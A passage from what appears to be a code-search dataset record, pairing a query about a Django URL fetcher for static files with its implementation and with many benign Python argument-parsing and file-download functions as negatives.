default=\"300,600,30\")\n parser.add_argument(\"-v\", \"--vib_scale\", help=\"Scaling factor to be used for vibrational frequencies. If not \"\n \"provided, the GoodVibes default value will be used.\",\n default=None)\n parser.add_argument(\"-p\", \"--plot\", help=\"Make a \\u0394G plot at the specified temp. The default is False.\",\n action='store_true')\n parser.add_argument(\"-pl\", \"--plot_labels\", help=\"Optional labels for \\u0394G plot. Enter as a list.\",\n default=None)\n parser.add_argument(\"-c\", \"--vibes_check\", help=\"In addition to standard checks always run (matching solvent, \"\n \"level of theory, stoichiometry, charge, multiplicity, and \"\n \"Gaussian versions), run files through GoodVibes '--check' before \"\n \"performing calculations. The default is False.\",\n action='store_true')\n parser.add_argument(\"-o\", \"--output_fname\", help=\"The name of the output file to be created. The default is the \"\n \"list name with the extension '.csv', or '{}' if no list name \"\n \"provided.\".format(DEF_OUT_FILE_NAME), default=None)\n\n parser.add_argument(\"-s\", \"--save_vibes\", help=\"Save the output from running GoodVibes in separate files, \"\n \"named with the Gaussian log file prefix and '.dat'. \"\n \"The default is False.\",\n action='store_true')\n parser.add_argument(\"-t\", \"--tog_vibes\", help=\"Save the output from running GoodVibes in one file, \"\n \"renamed with the output file prefix and '.dat'. \"\n \"The default is False.\",\n action='store_true')\n\n args = None\n try:\n args = parser.parse_known_args(argv)\n options = args[0]\n if not options.out_dir:\n options.out_dir = os.getcwd()\n # user can define a new directory as the output directory\n if not os.path.exists(options.out_dir):\n os.makedirs(options.out_dir)\n\n if options.output_fname:\n options.output_fname = os.path.abspath(os.path.join(options.out_dir, options.output_fname))\n elif options.list:\n options.output_fname = create_out_fname(options.list, ext='.csv', base_dir=options.out_dir)\n else:\n options.output_fname = create_out_fname(DEF_OUT_FILE_NAME, ext='.csv', base_dir=options.out_dir)\n\n if options.plot_labels:\n options.plot_labels = options.plot_labels.split(',')\n else:\n options.plot_labels = ['']\n\n if options.vib_scale:\n options.vib_scale = float(options.vib_scale)\n\n except (SystemExit, ValueError) as e:\n if hasattr(e, 'code') and e.code == 0:\n return args, GOOD_RET\n warning(e)\n parser.print_help()\n return args, INPUT_ERROR\n\n return args, GOOD_RET", "def parse_args():\n parser = argparse.ArgumentParser(description='Extract left-turn speed data CSV files from Excel')\n parser.add_argument('veh_conflict_data', type=str, help='Excel file with all veh conflicts data')\n return parser.parse_args()", "def readArgs():\n parser = argparse.ArgumentParser(description=\n \"\"\"Debug script. This program is used in order to generate a summary\n statistics for the csv files generated by the annotation_parser. Things\n like the average amount of overlap of each window and the average deviation.\n \"\"\")\n\n parser.add_argument('-f', '--csv-dir', metavar='',\n dest='csv_dir',\n action='store', default=os.path.dirname(os.path.abspath(__file__)),\n help='Specify the csv directory.')\n parser.add_argument('-d', '--deviation', metavar='',\n dest='deviation', action='store',\n default=50,\n help='percentage set point from which evaluate the deviation from.')\n\n return parser.parse_args()", "def parse_args(args):\n parser = argparse.ArgumentParser(\n description=\"Lookup table generator for Image Comparison\")\n parser.add_argument(\n \"--version\",\n action=\"version\",\n version=\"lookuptable {ver}\".format(ver=__version__))\n parser.add_argument(\n \"-f\",\n \"--folder\",\n dest=\"imagefolder\",\n help=\"path to image folder\",\n type=str,\n metavar=\"STRING\")\n parser.add_argument(\n \"-v\",\n \"--verbose\",\n dest=\"loglevel\",\n help=\"set loglevel to INFO\",\n action=\"store_const\",\n const=logging.INFO)\n parser.add_argument(\n \"-vv\",\n \"--very-verbose\",\n dest=\"loglevel\",\n help=\"set loglevel to DEBUG\",\n action=\"store_const\",\n const=logging.DEBUG)\n return parser.parse_args(args)", "def parse_command_line():\n parser = argparse.ArgumentParser(description='Parses ID\\'s from the DDI compendium search results, and then downloads the html and puts them into a sqlite database.')\n parser.add_argument('-f', '--file', dest='file',\n action='store',\n help='Filenname to be read')\n arg_manager = parser.parse_args()\n return arg_manager", "def parse_args():\n parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter)\n parser.add_argument(\"plumes\", help=\"path to input plume file\")\n parser.add_argument(\"output\", help=\"path to output plume file\")\n parser.add_argument(\"-r\", \"--radius\", required=True,\n help=\"radius (meters) for nearest neighbor clustering\")\n parser.add_argument(\"-v\", \"--visualize\", action='store_true',\n help=\"Show plot of points/clusters (default=no plot)\")\n args = parser.parse_args()\n return args.plumes, args.output, float(args.radius), args.visualize", "def parse_args():\n help_text = \"\"\"\n Analyzer of the frequency of use of nouns in the headings of posts on hubr.com\n \"\"\"\n parser = argparse.ArgumentParser(\n description=help_text\n )\n parser.add_argument(\n '-p',\n '--pages',\n type=int,\n dest='page_count',\n default=PAGE_COUNT,\n help=f'Number of pages to parse, default is {PAGE_COUNT}.'\n )\n parser.add_argument(\n '-s',\n '--start',\n type=int,\n default=PAGE_START,\n dest='start_page',\n help=f'Start page number, default is {PAGE_START}.',\n )\n parser.add_argument(\n '-t',\n '--top',\n type=int,\n default=TOP_SIZE,\n dest='top_size',\n help=f'The size of the top noun, default is {TOP_SIZE}.',\n )\n\n return parser.parse_args()", "def _parse_args():\n parser = argparse.ArgumentParser(description=\"\")\n #parser.add_argument(\"args\", metavar=\"N\", type=str, nargs=\"*\", help=\"Positional arguments.\")\n #parser.add_argument(\"\", dest=\"\", type=\"\", default=, help=)\n #parser.add_argument(\"--version\", action=\"version\", version=\"<the version>\")\n\n return parser.parse_args()", "def parse_command_line():\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"img\", type=argparse.FileType(\"r\"),\n help=\"The image file to test\")\n\n encoders = [\"sse2\", \"sse4.1\", \"avx2\"]\n parser.add_argument(\"--encoder\", dest=\"encoder\", default=\"avx2\",\n choices=encoders, help=\"select encoder variant\")\n\n testquant = [str(x) for x in range (0, 101, 10)]\n testqual = [\"-fastest\", \"-fast\", \"-medium\", \"-thorough\", \"-exhaustive\"]\n qualities = testqual + testquant\n parser.add_argument(\"--test-quality\", dest=\"quality\", default=\"medium\",\n choices=qualities, help=\"select compression quality\")\n\n parser.add_argument(\"--no-startup\", dest=\"noStartup\", default=False,\n action=\"store_true\", help=\"Exclude init\")\n\n args = parser.parse_args()\n\n return args", "def parse_args():\n\n\t#diff_help = 'Use flag to calculate differences.'\n\t#ratio_help = 'Use flag to calculate ratios.'\n\t#cte_help = 'Use flag to subtract flt from flc for same rootname'\n\tncores_help = 'Number of cores to use for multiprocessing. Default value is 8.'\n\tfirst_help = 'Path to first image(s) to be compared.'\n\tfile_help = 'file type to be compared.'\n\n\tncores = 1\n\n\tparser = argparse.ArgumentParser()\n\t#parser.add_argument('-n', type=int, help=ncores_help, action='store',\n\t#\trequired=False, default=ncores)\n\tparser.add_argument('fp', type=str, metavar='first_path', help=first_help, action='store')\n\tparser.add_argument('ft', type=str, metavar='file_type', help=file_help, action='store')\n\targs=parser.parse_args()\n\n\treturn args", "def parse_arguments():\n parser = argparse.ArgumentParser(description='Scraper')\n parser.add_argument('--prefix', help='Prefix for saving files', default=\"\")\n parser.add_argument('--path', help='Dir path', default=\"\")\n parser.add_argument('--urls_path', help='Url path', default=False)\n parser.add_argument('--url', help='Url', default=False)\n parser.add_argument('--disney', dest='disney', action='store_true', help=\"Choose all disney movies\")\n parser.add_argument('--ngram', help='Max ngram', default=2)\n\n args = parser.parse_args()\n return args", "def parse_arguments():\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--accessions\", help=\"A json file with old/new family mapppings\")\n parser.add_argument(\"--add-header\", help=\"Print descriptive header\",\n action=\"store_true\", default=False)\n parser.add_argument(\"--add-links\", help=\"Creates hyperlinks to available Rfam html content\",\n action=\"store_true\", default=False)\n return parser", "def parse_args(args=None):\n\t\treturn _get_args_parser().parse_args(args)", "def _parse_args():\n parser = argparse.ArgumentParser(description='Run DAFI.')\n parser.add_argument('input_file', help='Name (path) of input file')\n return parser.parse_args()", "def parse_command_line():\n parser = argparse.ArgumentParser()\n\n # Optional Argument\n parser.add_argument('-l', '--length', metavar='length', type=float, default=2, help='length (meter)')\n parser.add_argument('-k', '--conductivity', metavar='conductivity', type=float, default=0.5, help='constant thermal conductivity (W/m.K)')\n parser.add_argument('-q', '--heatgeneration', metavar='heatgeneration', type=float, default=1000, help='uniform heat generation (kW/m^3)')\n parser.add_argument('-TA', '--tempA', metavar='tempA', type=int, default=100, help='temperature at A (Celcius)')\n parser.add_argument('-TB', '--tempB', metavar='tempB', type=int, default=200, help='temperature at A (Celcius)')\n parser.add_argument('-n', '--nodes', metavar='nodes', type=int, default=5, help='nodes (positive integer)')\n parser.add_argument('-A', '--area', metavar='area', type=float, default=1, help='area (m^2)')\n parser.add_argument('-nf', '--nofigure', action='store_true', help='disable figure')\n parser.add_argument('-nd', '--nodetail', action='store_true', help='disable detail')\n return parser.parse_args()", "def parse_cmdline(argv):\n if argv is None:\n argv = sys.argv[1:]\n\n # initialize the parser object:\n parser = argparse.ArgumentParser(description='For each timestep, gather the energy information output by LAMMPS '\n 'in the log file.')\n parser.add_argument(\"-f\", \"--file\", help=\"The log file to be processed.\",\n default=None)\n parser.add_argument(\"-l\", \"--list_file\", help=\"The a file with a list of log files to be processes.\",\n default=None)\n args = None\n try:\n args = parser.parse_args(argv)\n if args.file is None:\n args.file_list = []\n else:\n if os.path.isfile(args.file):\n args.file_list = [args.file]\n args.source_name = args.file\n else:\n raise IOError(\"Could not find specified log file: {}\".format(args.file))\n if args.list_file is not None:\n args.file_list += file_rows_to_list(args.list_file)\n args.source_name = args.list_file\n if len(args.file_list) < 1:\n raise InvalidDataError(\"Found no log file names to process. Specify one or more files as specified in \"\n \"the help documentation ('-h').\")\n except IOError as e:\n warning(\"Problems reading file:\", e)\n parser.print_help()\n return args, IO_ERROR\n except (KeyError, InvalidDataError, SystemExit) as e:\n if hasattr(e, 'code') and e.code == 0:\n return args, GOOD_RET\n warning(e)\n parser.print_help()\n return args, INPUT_ERROR\n return args, GOOD_RET", "def parse_args():\n\n\t# Define the input parser\n\tdesc = \"computes long term temperature anomaly trend for the GHNC dataset\"\n\tepilog = \"\"\"\ndatarange input argument is of the format:\n\t\t YYYY[MM[DD]][:YYYY[MM[DD]]]\nWhere the date before the optional ':'' represents the lower bound of\nthe range and the optional date after the : represents the upper\nbound. The optional elements of the date default to the lowest possible\nvalue for the lower bound and to the maximum possible for the upper\none. For example,\n\t2006 is equivalent to 2006/01/01:2006/12/31\n\t2006/02 is equivalent to 2006/02/01:2006/02/28\n\"\"\"\n\n\tparser = argparse.ArgumentParser(description=desc, epilog=epilog,\n\t\t\t\t\t\tformatter_class=argparse.RawDescriptionHelpFormatter)\n\tparser.add_argument(\"daterange\",\n\t\t\t\t\t\thelp=\"range of dates to make available locally\")\n\tparser.add_argument('-t',\"--timeseries\",nargs=2,metavar=('lon','lat'),type=float,\n\t\t\t\t\t\thelp=\"plot timeseries for the lon lat pair of coordinates\")\n\tparser.add_argument('-r',\"--recompute\",default=False,action='store_true',\n\t\t\t\t\t\thelp=\"force recompute trend\")\n\n\treturn parser.parse_args()", "def _parse_args():\n parser = argparse.ArgumentParser(description='main.py')\n \n # General system running and configuration options\n parser.add_argument('--do_nearest_neighbor', dest='do_nearest_neighbor', default=False, action='store_true', help='run the nearest neighbor model')\n\n parser.add_argument('--train_path', type=str, default='data/geo_train.tsv', help='path to train data')\n parser.add_argument('--dev_path', type=str, default='data/geo_dev.tsv', help='path to dev data')\n parser.add_argument('--test_path', type=str, default='data/geo_test.tsv', help='path to blind test data')\n parser.add_argument('--test_output_path', type=str, default='geo_test_output.tsv', help='path to write blind test results')\n parser.add_argument('--domain', type=str, default='geo', help='domain (geo for geoquery)')\n \n # Some common arguments for your convenience\n parser.add_argument('--seed', type=int, default=0, help='RNG seed (default = 0)')\n parser.add_argument('--epochs', type=int, default=100, help='num epochs to train for')\n parser.add_argument('--lr', type=float, default=.001)\n parser.add_argument('--batch_size', type=int, default=2, help='batch size')\n # 65 is all you need for GeoQuery\n parser.add_argument('--decoder_len_limit', type=int, default=65, help='output length limit of the decoder')\n\n # Feel free to add other hyperparameters for your input dimension, etc. to control your network\n # 50-200 might be a good range to start with for embedding and LSTM sizes\n args = parser.parse_args()\n return args", "def parse_command_line_arguments():\n parser = argparse.ArgumentParser(\n description=\"Convert dependency files into list of GitHub links.\",\n epilog=\"For help with this program, contact John Speed at [email protected].\",\n )\n parser.add_argument(\n \"--python\",\n default=False, # default value is False\n help=\"Convert requirements.txt file into GitHub links.\",\n )\n return parser.parse_args()", "def parse_args():\n parser = argparse.ArgumentParser(description=\"Re-ID feature extractor\")\n parser.add_argument(\n \"--model\",\n default=\"resources/networks/mars-small128.ckpt-68577\",\n help=\"Path to checkpoint file\")\n parser.add_argument(\n \"--loss_mode\", default=\"cosine\", help=\"Network loss training mode\")\n parser.add_argument(\n \"--mot_dir\", help=\"Path to MOTChallenge directory (train or test)\",\n required=True)\n parser.add_argument(\n \"--detection_dir\", help=\"Path to custom detections. Defaults to \"\n \"standard MOT detections Directory structure should be the default \"\n \"MOTChallenge structure: [sequence]/det/det.txt\", default=None)\n parser.add_argument(\n \"--output_dir\", help=\"Output directory. Will be created if it does not\"\n \" exist.\", default=\"detections\")\n return parser.parse_args()", "def parseArgs ():\n independentBaseName = None\n dependentBaseName = None\n independentTSID = None\n dependentTSID = None\n statisticsFile = None\n nEquations = None\n logFile = None\n #\n # Loop through command line arguments\n for arg in sys.argv:\n parts = arg.split('=')\n if ( (parts == None) or (len(parts) != 2) ):\n # Not an arg=value command line argument\n continue\n argName = parts[0].upper()\n argValue = parts[1]\n if ( argName == 'DEPENDENTBASENAME' ):\n dependentBaseName = argValue\n elif ( argName == 'DEPENDENTTSID' ):\n dependentTSID = argValue\n elif ( argName == 'INDEPENDENTBASENAME' ):\n independentBaseName = argValue\n elif ( argName == 'INDEPENDENTTSID' ):\n independentTSID = argValue\n elif ( argName == 'LOGFILE' ):\n logFile = argValue\n elif ( argName == 'NUMBEROFEQUATIONS' ):\n nEquations = int(argValue)\n elif ( argName == 'STATISTICSFILE' ):\n statisticsFile = argValue\n return ( independentBaseName, dependentBaseName, independentTSID, dependentTSID,\n statisticsFile, nEquations, logFile )", "def parse_args():\r\n desc = \"Check for the longest running requests in bookie\"\r\n parser = argparse.ArgumentParser(description=desc)\r\n\r\n parser.add_argument('-l', '--log', dest='log',\r\n action='store',\r\n default=None,\r\n required=True,\r\n help=\"log file we're reading requests from\")\r\n\r\n parser.add_argument('-n', '--number', dest='count',\r\n action='store',\r\n default=10,\r\n type=int,\r\n required=False,\r\n help=\"how many urls do we wish to see, default 10\")\r\n\r\n\r\n args = parser.parse_args()\r\n return args", "def parse_args():\n description = \"Plots loss data from DriveNet\"\n parser = argparse.ArgumentParser(description=description)\n\n parser.add_argument('path', metavar='P', type=str, nargs='?',\n help='path of the loss data to be plotted.')\n return parser.parse_args()", "def _parse_args():\n parser = argparse.ArgumentParser(description='Pure-python command-line calculator.')\n\n parser.add_argument('EXPRESSION', action=\"store\", type=str, help=\"expression string to evaluate\")\n parser.add_argument('-m', '--use-modules', nargs='+', action=\"store\", dest=\"MODULE\", type=str,\n help=\"additional modules to use\")\n\n return parser.parse_args()", "def parse_args():\n parser = argparse.ArgumentParser(description=\"Deep SORT\")\n parser.add_argument(\n \"--input\", help=\"Path to MOTChallenge sequence directory\",\n default=None, required=True)\n return parser.parse_args()", "def parse_cmdline_args():\n parser = argparse.ArgumentParser(description=\"Guesses the functional element for host.\")\n ##\n ## Internal options\n ##\n parser.add_argument(\"--json\", dest=\"json\", action='store_true', help=\"output in JSON\")\n\n ##\n ## PuppetDB options\n ##\n pdbconf = PdbConfig()\n pdbconf.add_standard_args(parser)\n\n parser.add_argument(\"host\", metavar=\"HOST\",\n help=\"hostnames to query for FE\")\n\n return parser.parse_args()", "def parse_args():\n from argparse import ArgumentParser\n ap = ArgumentParser(prog=__exe__, description=__purpose__)\n ap.add_argument(\n '--host', dest='host', default=None,\n help='Host for XNAT. Default: env XNAT_HOST.')\n ap.add_argument(\n '-u', '--username', dest='username', default=None,\n help='Username for XNAT.')\n ap.add_argument('project', help='Project Label')\n ap.add_argument('session', help='Session Label')\n ap.add_argument(\n 'proc_suffix', help='Proc name suffix', nargs='?', default='')\n ap.add_argument(\n '-sd', '--subjects_dir', dest='subjects_dir',\n help='Subjects Directory',\n default=os.environ.get('SUBJECTS_DIR', '/tmp'))\n return ap.parse_args()", "def _parse_args():\n usage = \"usage: %prog [options] arg1 arg2\"\n parser = optparse.OptionParser()\n parser.add_option(\n '--platform', dest='platform', default=\"\", type = \"string\",\n help='platform name: UC 360 baidu etc.')\n parser.add_option(\n '--workspace', dest='workspace', default=\"./\", type = \"string\",\n help='project directory.')\n parser.add_option(\n '--project', dest='projectDir', default=\"./destProject\", type = \"string\",\n help='project directory.')\n # parser.add_option(\n # \"-t\", dest=\"test\", action=\"store_const\", const=lambda:_test, default=_test2, help=\"////////////\"\n # )\n options, args = parser.parse_args()\n # positional arguments are ignored\n return options, args", "def parse_args():\n parser = argparse.ArgumentParser(description='Crawl an Android app store for apk files.')\n parser.add_argument('--store', dest='api', choices=['GooglePlay', 'F-Droid'], required=True,\n help='Specifies the store to crawl. At the moment only Google Play is supported.')\n parser.add_argument('--meta', dest='meta', required=False, action='store_const', default=False, const=True,\n help='If set, no apps will be downloaded, but the meta_data will be saved.')\n parser.add_argument('--basedir', dest='base_dir', type=str, default=os.getenv('HOME'),\n required=False, help='Specifies the base path for both logs and apk_downloads.')\n parser.add_argument('--credentials', dest='credentials', type=str, required=False, default=None,\n help='Specifies the path to a credential file in .toml format.')\n parser.add_argument('--limit', dest='limit', type=int, required=False, default=None,\n help='Specifies the maximum number of apks per category to download.')\n return parser.parse_args()", "def parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-t\", \"--thoughtspot_host\", required=True,\n help=\"domain or ip. E.g. http://1.1.1.1\")\n parser.add_argument(\"-u\", \"--username\", required=True,\n help=\"username - must have administrative privileges\")\n parser.add_argument(\"-p\", \"--password\", required=True,\n help=\"password - must have administrative privileges\")\n parser.add_argument(\"-d\", \"--delimiter\", default=',',\n help=\"character to seperate values by. Default to comma\")\n parser.add_argument(\"-c\", \"--csv\", action=\"store_true\",\n help=\"create csv file called permissions.csv\")\n parser.add_argument(\"-s\", \"--share\", action=\"store_true\",\n help=\"output usable format for share api\")\n return parser.parse_args()", "def parse_args():\n p = argparse.ArgumentParser(\n description='Parse system logs, for fun or something')\n p.add_argument('-l', '--log', dest='log_file', help='The log file')\n p.add_argument('-f', '--filter', dest='filter', help='filter by daemon')\n return p.parse_args()", "def parse_args(args):\n\n parser = argparse.ArgumentParser(\n description=\"\"\"Generates and runs an afni_proc.py script to preprocess resting state fMRI data\"\"\",\n formatter_class=argparse.RawDescriptionHelpFormatter)\n\n # Optional Flags\n parser.add_argument(\"-t\", \"--trs_remove\", action=\"store\", default=5, type=int, metavar='TRs',\n help=\"\"\"number of trs to remove at the beginning of the epi data\n (default = 5 trs)\"\"\")\n parser.add_argument(\"-d\", \"--dim_voxel\", action=\"store\", default=2.0, type=float, metavar='MM',\n help=\"voxel dimensions in mm that processed epi will be resampled to (default = 2.0 mm)\")\n parser.add_argument(\"-b\", \"--bandpass\", action=\"store\", default=[0.01, 0.25], nargs=2, type=float, metavar=\"F\",\n help=\"bandpass frequencies lower and upper limits (default = 0.01 0.25)\")\n parser.add_argument(\"-v\", \"--volumes\", action=\"store\", default=0, type=int, metavar=\"V\",\n help=\"\"\"truncate the epi data to the inputted number of volumes, useful if subjects have data \n with different numbers of volumes (default = no truncation)\"\"\")\n parser.add_argument(\"-f\", \"--fwhm\", action=\"store\", default=5.0, type=float, metavar=\"MM\",\n help=\"the full width half maximum that is used when blurring (default = 5.0 mm)\")\n parser.add_argument(\"-c\", \"--cores\", action=\"store\", default=cpu_count(), type=int, metavar=\"C\",\n help=\"number of cores supplied to 3dDeconvolve (default = all cores)\")\n parser.add_argument(\"-s\", \"--subj_id\", action=\"store\", default=\"sub\", metavar=\"SUB\",\n help=\"text file of subject ids (default = sub)\")\n parser.add_argument(\"-T\", \"--time_step\", action=\"store\", default=0, type=float, metavar=\"TS\",\n help=\"set the time step for bandpassing (default = ts in header info\")\n\n parser.add_argument(\"-g\", \"--global_signal_regression\", action=\"store_false\", default=True,\n help=\"do not perform global signal regression (default = perform gsr)\")\n\n parser.add_argument(\"-r\", \"--rerun\", action=\"store_true\", default=False,\n help=\"\"\"rerun preprocessing, override and delete previous results in \n 'Processed' folder (default = don't override)\"\"\")\n parser.add_argument(\"-m\", \"--motion_param\", action=\"store_true\", default=False,\n help=\"use 12 motion parameters for regression (default = 6 motion parameters)\")\n parser.add_argument(\"-G\", \"--gm_blur\", action=\"store_true\", default=False,\n help=\"blur only in grey matter mask (default = blur in whole brain)\")\n parser.add_argument(\"-n\", \"--nl_reg\", action=\"store_true\", default=False,\n help=\"use non-linear warp between anatomical and MNI template (default = linear warp)\")\n\n # Required Inputs\n required = parser.add_argument_group(\"required arguments\")\n required.add_argument(\"-e\", \"--epi\", action=\"store\", required=True,\n help=\"text file of paths to raw epi data\")\n required.add_argument(\"-a\", \"--anat\", action=\"store\", required=True,\n help=\"text file of paths to raw anatomical data\")\n required.add_argument(\"-o\", \"--out_dir\", action=\"store\", required=True, metavar=\"OUT\",\n help=\"text file of paths to output directory\")\n result = parser.parse_args(args)\n\n # Make sure inputted parameters are legal\n assert (os.path.isfile(result.epi)), \"{} does not exist or is not a file\".format(result.epi)\n assert (os.path.isfile(result.anat)), \"{} does not exist or is not a file\".format(result.ant)\n assert (result.trs_remove >= 0), \"Cannot remove negative trs\"\n assert (result.dim_voxel >= 0), \"Cannot have a negative voxel dimension\"\n assert (np.all(np.array(result.bandpass) > 0)), \"Cannot have a negative frequency limit for bandpassing\"\n assert (result.volumes > -1), \"Number of volumes must be greater than 0\"\n assert (result.cores > 0), \"Number of cores used must be greater than 0\"\n assert (result.time_step > -1), \"Time step must be greater than 0\"\n\n return result" ]
[ "0.84956664", "0.77526116", "0.7492404", "0.74425805", "0.74166906", "0.7415034", "0.7406717", "0.7405937", "0.7394592", "0.739314", "0.7353777", "0.73531276", "0.73295814", "0.7326098", "0.73121136", "0.7297962", "0.72947985", "0.7294619", "0.7293887", "0.7288054", "0.7277133", "0.72563785", "0.72437865", "0.7243087", "0.72430533", "0.7241911", "0.72298014", "0.7221696", "0.7221482", "0.7207887", "0.72045344", "0.72003675", "0.7200169", "0.71875507", "0.7184408", "0.71760046", "0.7175724", "0.7172937", "0.7172867", "0.7172343", "0.7171222", "0.7161979", "0.71516496", "0.71502995", "0.71464944", "0.7145171", "0.71446747", "0.71436745", "0.71359694", "0.7126661", "0.712521", "0.7119091", "0.7114765", "0.71143436", "0.71121776", "0.71119547", "0.71076643", "0.7100978", "0.70999265", "0.70973307", "0.7091392", "0.70905906", "0.7086302", "0.70848346", "0.7082589", "0.7079362", "0.7078844", "0.70729834", "0.70726", "0.7072261", "0.7068931", "0.70667356", "0.7065753", "0.70650667", "0.7060762", "0.70596355", "0.70589256", "0.7055559", "0.7053237", "0.7052089", "0.7050814", "0.7050462", "0.70480955", "0.7043109", "0.70421845", "0.704139", "0.70407385", "0.7039865", "0.703852", "0.7036937", "0.7035592", "0.70350444", "0.70347494", "0.70328957", "0.70296645", "0.70276535", "0.7026858", "0.70266956", "0.7026401", "0.70247054", "0.70229745" ]
0.0
-1
Returns the file for a given URL. If the URL appear to be a static file, we will attempt to load it internally. Otherwise, it will resolve normally as an external URL. Relative URLs are only supported The default behaviour will fetch any http(s) files normally, and will also attempt to resolve staticfiles internally (this should mostly affect development scenarios, but also works if static files are served under a relative URL).
def django_url_fetcher(url: str): # If the URL looks like a staticfile, try to load it as such. # Reading it from the storage avoids a network call in many cases (unless the # storage is remote, in which case this improves nothing: try: if url.startswith(staticfiles_storage.base_url): filename = url.replace(staticfiles_storage.base_url, "", 1) data = None path = finders.find(filename) if path: # Read static files from source (e.g.: the file that's bundled with the # Django app that provides it. # This also picks up uncollected staticfiles (useful when developing / # in DEBUG mode). with open(path, "rb") as f: data = f.read() else: # File was not found by a finder. This commonly happens when running in # DEBUG=True with a storage that uses Manifests or alike, since the # filename won't match with the source file. # In these cases, use the _storage_ to find the file instead: with staticfiles_storage.open(filename) as f: data = f.read() return { "mime_type": mimetypes.guess_type(url)[0], "string": data, } except (ValueError, FileNotFoundError): # Looks like this wasn't a staticfile (or maybe it was a missing one?) # Let it resolve as a normal URL. pass try: # If the URL is a relative URL, use Django's resolver to figure out how Django # would serve this. # # This should cover all those funky scenarios like: # - Custom views that serve dynamically generated files. # - Media files (if serving them via Django, which is not recommended). if url.startswith("/"): view, args, kwargs = resolve(url) kwargs["request"] = HttpRequest kwargs["request"].method = "GET" response = view(*args, **kwargs) return { "mime_type": mimetypes.guess_type(url)[0], "string": response.content, } except Resolver404 as e: raise InvalidRelativeUrl(f"No view matched `{url}`.") from e return default_url_fetcher(url)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_file(cls, url, working_dir):\n if url.lower().startswith(\"s3://\"):\n return cls._s3_get_file(url)\n elif url.lower().startswith(\"http\"):\n return cls._http_get_file(url)\n else:\n return cls._fs_get_file(url, working_dir)", "def _fs_get_file(url, working_dir):\n if not os.path.isabs(url) and working_dir:\n url = os.path.join(working_dir, url)\n\n try:\n with codecs.open(url, 'r', encoding='utf-8') as f:\n return f.read()\n except Exception as e:\n raise ScrBaseException(\"Could not load file from {0}: {1}\".format(url, e))", "def get_url(url: str) -> Optional[str]:\n try:\n parsed = urlparse(url)\n except ValueError:\n return None\n\n if parsed.scheme in (\"file\", \"\"):\n return unquote(parsed.path)\n elif parsed.scheme in (\"http\", \"https\"):\n if url.startswith(\"https://open.spotify.com/image/\"):\n url = \"https://i.scdn.co/image/\" + url[len(\"https://open.spotify.com/image/\") :]\n\n name = hashlib.sha1(url.encode(\"utf-8\")).hexdigest()\n path = os.path.join(CACHE_PATH, name) + Path(parsed.path).suffix\n\n if os.path.isfile(path):\n info(f\"Already downloaded at {path}\")\n return path\n\n # Download the file to our cache. We should probably do this asynchronously,\n # but rely on the fact that the remote server is _probably_ fast enough.\n warning(f\"Downloading {url} -> {path}\")\n try:\n os.makedirs(CACHE_PATH, exist_ok=True)\n with urlopen(url) as read:\n with open(path, \"wb\") as write:\n while chunk := read.read(2048):\n write.write(chunk)\n\n return path\n except Exception as e:\n critical(\"Error getting image \" + str(e))\n\n try:\n os.remove(path)\n except:\n pass\n\n return None\n else:\n return None", "def _getFile(url, cachedFile=True, return_filename=False):\n assert url, \"WHY are you trying to load an empty string url?!?! Nothing good will come of this! In fact, I will assure that! %s\" % (url)\n md5 = hashlib.md5(url).hexdigest()\n filename = os.path.join(config.WEB_CACHE_DIR, md5)\n if os.path.exists(filename) and cachedFile:\n ret = open(filename, 'r').read()\n else:\n opener = urllib.FancyURLopener()\n ret = opener.open(url).read()\n o = open(filename, 'wb') # had to open in binary mode so PIL's Image.Open() function would work\n o.write(ret)\n o.close()\n if return_filename:\n return filename\n else:\n return ret", "def _get_file_url(path):\n return urlparse.urljoin(BASE_URL, path)", "def cached_path(url_or_filename, cache_dir=None, force_download=False, proxies=None):\n\tif cache_dir is None:\n\t\tcache_dir = PYTORCH_TRANSFORMERS_CACHE\n\tif sys.version_info[0] == 3 and isinstance (url_or_filename, Path):\n\t\turl_or_filename = str (url_or_filename)\n\tif sys.version_info[0] == 3 and isinstance (cache_dir, Path):\n\t\tcache_dir = str (cache_dir)\n\n\tparsed = urlparse (url_or_filename)\n\n\tif parsed.scheme in ('http', 'https', 's3'):\n\t\t# URL, so get it from the cache (downloading if necessary)\n\t\treturn get_from_cache (url_or_filename, cache_dir=cache_dir, force_download=force_download, proxies=proxies)\n\telif os.path.exists (url_or_filename):\n\t\t# File, and it exists.\n\t\treturn url_or_filename\n\telif parsed.scheme == '':\n\t\t# File, but it doesn't exist.\n\t\traise EnvironmentError (\"file {} not found\".format (url_or_filename))\n\telse:\n\t\t# Something unknown\n\t\traise ValueError (\"unable to parse {} as a URL or as a local path\".format (url_or_filename))", "def get_file_from_url(url):\n tmp = url\n for ch in [':', '/', '.', '?', '=', '&', ',']:\n if ch in tmp:\n tmp = tmp.replace(ch, '_')\n path_dir = path.join(path.dirname(\n path.abspath(__file__)), 'test_data/')\n return path.join(path.join(path_dir, tmp))", "def get_file_from_url(url):\n tmp = url\n for ch in [':', '/', '.', '?', '=', '&', ',']:\n if ch in tmp:\n tmp = tmp.replace(ch, '_')\n path_dir = path.join(path.dirname(\n path.abspath(__file__)), 'test_data/')\n return path.join(path.join(path_dir, tmp))", "def get_file_from_url(url):\n tmp = url\n for ch in [':', '/', '.', '?', '=', '&', ',']:\n if ch in tmp:\n tmp = tmp.replace(ch, '_')\n path_dir = path.join(path.dirname(\n path.abspath(__file__)), 'test_data/')\n return path.join(path.join(path_dir, tmp))", "def cached_path(url_or_filename, cache_dir=None):\n if cache_dir is None:\n cache_dir = PYTORCH_PRETRAINED_BERT_CACHE\n if sys.version_info[0] == 3 and isinstance(url_or_filename, Path):\n url_or_filename = str(url_or_filename)\n if sys.version_info[0] == 3 and isinstance(cache_dir, Path):\n cache_dir = str(cache_dir)\n\n parsed = urlparse(url_or_filename)\n\n if parsed.scheme in (\"http\", \"https\", \"s3\"):\n # URL, so get it from the cache (downloading if necessary)\n return get_from_cache(url_or_filename, cache_dir)\n elif os.path.exists(url_or_filename):\n # File, and it exists.\n return url_or_filename\n elif parsed.scheme == \"\":\n # File, but it doesn't exist.\n raise EnvironmentError(\"file {} not found\".format(url_or_filename))\n else:\n # Something unknown\n raise ValueError(\"unable to parse {} as a URL or as a local path\".format(url_or_filename))", "def fetch_file_from_web(server_url, path, transform_func=json.loads):\n artifact_url = 